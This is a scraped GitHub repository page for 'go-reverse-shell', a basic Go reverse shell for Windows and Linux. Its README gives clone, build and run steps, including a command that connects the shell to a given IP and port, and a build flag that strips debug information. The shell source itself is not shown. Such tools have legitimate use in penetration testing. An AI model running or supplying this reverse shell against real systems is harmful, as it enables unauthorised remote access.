Skip to content

AssassinUKG/go-reverse-shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

go-reverse-shell

A basic shell made in go for windows and linux

Install (linux)

git clone https://github.com/AssassinUKG/go-reverse-shell.git
cd go-reverse-shell
go build revshell/shell.go
./shell -i IP -P PORT

image

Build

Windows

go build .\shell.go

Linux

go build shell

Remove debugger info.

go build -ldflags "-s -w"

About

A basic shell made in go for windows and linux

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages